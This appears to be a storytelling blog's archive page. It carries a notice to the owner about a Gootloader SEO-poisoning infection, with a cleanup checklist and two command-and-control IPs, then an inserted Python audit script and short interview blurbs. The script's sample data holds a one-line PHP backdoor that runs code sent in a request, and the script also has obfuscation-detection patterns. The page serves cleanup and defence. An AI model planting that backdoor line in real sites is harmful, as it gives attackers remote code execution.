Archives

All posts by Alexander Yellen

Dear blog owner and visitors,

This blog had been infected to serve up Gootloader malware to Google search victims, via a common tactic known as SEO (Search Engine Optimization) poisoning. Your blog was serving up 203 malicious pages. Your blog served up malware to 0 visitors.

I tried my best to clean up the infection, but I would do the following:

  • Upgrade WordPress to the latest version (one way the attackers might have gained access to your server)
  • Upgrade all WordPress themes to the latest versions (another way the attackers might have gained access to your server)
  • Upgrade all WordPress plugins (another way the attackers might have gained access to your server), and remove any unnecessary plugins.
  • Verify all users are valid (in case the attackers left a backup account, to get back in)
  • Change all passwords (for WordPress accounts, FTP, SSH, database, etc.) and keys. This is probably how the attackers got in, as they are known to brute force weak passwords
  • Run antivirus scans on your server
  • Block these IPs (5.8.18.7 and 89.238.176.151), either in your firewall, .htaccess file, or in your /etc/hosts file, as these are the attackers' command and control servers, which send malicious commands for your blog to execute
  • Check cronjobs (both server and WordPress), aka scheduled tasks. This is a common method that an attacker will use to get back in. If you are not sure what this is, Google it
  • Consider wiping the server completely, as you do not know how deep the infection is. If you decide not to, I recommend installing some security plugins for WordPress, to try and scan for any remaining malicious files. Integrity Checker, WordPress Core Integrity Checker, Sucuri Security, and Wordfence Security all do some level of detection, but not 100% guaranteed
  • Go through the process for Google to recrawl your site, to remove the malicious links (to see what malicious pages there were, go to Google and search site:your_site.com agreement)
  • Check subdomains, to see if they were infected as well
  • Check file permissions

Gootloader (previously Gootkit) malware has been around since 2014, and is used to initially infect a system, and then sell that access off to other attackers, who then usually deploy additional malware, to include ransomware and banking trojans. By cleaning up your blog, it will make a dent in how they infect victims. PLEASE try to keep it up-to-date and secure, so this does not happen again.

Sincerely,

The Internet Janitor

Below are some links to research/further explanation on Gootloader:

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/

https://www.richinfante.com/2020/04/12/reverse-engineering-dolly-wordpress-malware

https://blog.sucuri.net/2018/12/clever-seo-spam-injection.html

This message
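The cleanup checklist above (PHP files hidden in the uploads folder, obfuscated code in themes and plugins, world-writable files, recently changed files, and blocking the two command and control addresses) can be turned into a small offline audit. The script below is an added example written for this page, not code from the Internet Janitor or from WordPress; the sample file tree, its modes and file ages are constructed here to show what each check flags, and the two IP addresses are the ones named in the note.

```python
"""Offline audit of a WordPress tree against the cleanup checklist (added example)."""
import re
import stat
import time
from pathlib import Path

# Command and control addresses quoted in the cleanup note above.
C2_IPS = ("5.8.18.7", "89.238.176.151")

# Constructed sample tree: (relative path, permission bits, age in days, contents).
# One backdoored theme file, one PHP dropper in uploads, and clean files for contrast.
SAMPLE_TREE = [
    ("wp-config.php", 0o640, 400, b"<?php define('DB_NAME', 'wp'); ?>"),
    ("wp-content/themes/twentytwenty/functions.php", 0o644, 2,
     b"<?php if(isset($_REQUEST['x'])){eval(base64_decode($_REQUEST['x']));} ?>"),
    ("wp-content/uploads/2021/12/photo.jpg", 0o644, 30, b"\xff\xd8\xff"),
    ("wp-content/uploads/2021/12/cache.php", 0o666, 1, b"<?php echo 1; ?>"),
    ("wp-content/plugins/akismet/akismet.php", 0o644, 200, b"<?php // plugin ?>"),
]

# Functions that legitimate theme/plugin code rarely calls on attacker-supplied data.
OBFUSCATION = re.compile(
    rb"\b(eval|base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)


def walk_install(wp_root):
    """Yield (relative path, mode, age_days, contents) records from a real install."""
    root = Path(wp_root)
    now = time.time()
    for p in root.rglob("*"):
        if p.is_file():
            st = p.stat()
            yield (str(p.relative_to(root)), stat.S_IMODE(st.st_mode),
                   (now - st.st_mtime) / 86400, p.read_bytes())


def php_in_uploads(records):
    """The uploads directory holds media; any PHP there is a dropper or web shell."""
    return sorted(r[0] for r in records
                  if r[0].startswith("wp-content/uploads/") and r[0].lower().endswith(".php"))


def obfuscated_php(records):
    """PHP files that decode-and-execute, the usual shape of injected backdoors."""
    return sorted(r[0] for r in records
                  if r[0].lower().endswith(".php") and OBFUSCATION.search(r[3]))


def world_writable(records):
    """Files any local user (or a compromised neighbour site) can overwrite."""
    return sorted(r[0] for r in records if r[1] & stat.S_IWOTH)


def recently_modified(records, days=7):
    """Files touched inside the window, a cheap way to spot what the intruder changed."""
    return sorted(r[0] for r in records if r[2] <= days)


def htaccess_deny_block(ips=C2_IPS):
    """Apache 2.4 rule that refuses inbound requests from the listed addresses."""
    lines = ["<RequireAll>", "    Require all granted"]
    lines += [f"    Require not ip {ip}" for ip in ips]
    lines.append("</RequireAll>")
    return "\n".join(lines)


def audit(records, days=7):
    """Run every check once and return the findings keyed by check name."""
    records = list(records)
    return {
        "php_in_uploads": php_in_uploads(records),
        "obfuscated_php": obfuscated_php(records),
        "world_writable": world_writable(records),
        "recently_modified": recently_modified(records, days),
        "htaccess_deny_block": htaccess_deny_block(),
    }


if __name__ == "__main__":
    # Against a live install use audit(walk_install("/var/www/html")) instead.
    for check, finding in audit(SAMPLE_TREE).items():
        print(f"== {check} ==")
        print(finding if isinstance(finding, str) else "\n".join(finding) or "(none)")
```

The `.htaccess` block only stops requests arriving from those addresses; if the infected site is the one calling out, the same addresses need to be blocked for outbound traffic in the host firewall as the note's first option suggests. Treat the obfuscation pattern as a triage aid rather than a verdict: some legitimate plugins use `base64_decode`, so each hit should be compared against a clean copy of the theme or plugin.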

Brandy

Not only does every person have a story, but so does every pet. Brandy sniffed her way over to me in Union Square Park.

Cleo

There are many ways in which children gain independence from their parents. Cleo gained hers through learning how to read.

Amy

It’s the holiday season, and with the holidays come gifts. And while some of us spent lots of time shopping for gifts, Amy always knows exactly what to give.

When people sit down to tell me their story, I’m always excited when they have a tattoo that I can see. Tattoos are a way of taking a moment in time and permanently affixing it to yourself. Since there’s always a story behind the tattoo, I always have to ask.

This is Anthony’s Tattoo.

Megan

I used to be afraid of my basement. Every time the heat went on, the boiler made a loud noise that made me think that someone was running after me. Megan stopped by my table at The New School and told me what she used to be afraid of.

Adam

Baseball is so much more than just a game: It’s a part of American Culture; It connects generation to generation, father to son; and more than that, it’s a great conversation starter.

Adam was playing baseball in Central Park. That’s how our conversation started.

Louis

I’m always surprised at how personal some of these stories get, but I always want to know more. Unfortunately, Louis was running late and couldn’t answer any questions. Although I’m not sure he would have, anyway.

Ananda

I’ve been asking people to tell me their stories, partially to show that storytelling exists outside of the children’s section of the library; however, the occasional children’s story is a good one.

Ananda sat down and told me one of her favorite childhood stories: A Tale of King Arthur and What Women Want

I recently started a project that has recently been launched into a podcast. “Tell Me Your Story.” It’s me, my recording equipment, and a sign that says “Tell me your story” in a public place. Basically, people tell me their stories!

It’s an idea that was taken from Tony Kahn’s podcast, Morning Stories.

Tony Kahn is somewhat of a hero of mine. He is a public radio producer at WGBH. He was the original writer for ZOOM, has narrated over a dozen Nova episodes, was the original host of PRI’S The World, is a correspondent for NPR’s Marketplace, and was the producer of what is accepted to be public broadcasting’s first podcast, Morning Stories.

Tony found out about my project and interviewed me. Talking to him for 20 minutes was a real thrill for me and the interview is now available online.

You can check out the interview at Tony’s site, tonykahn.com.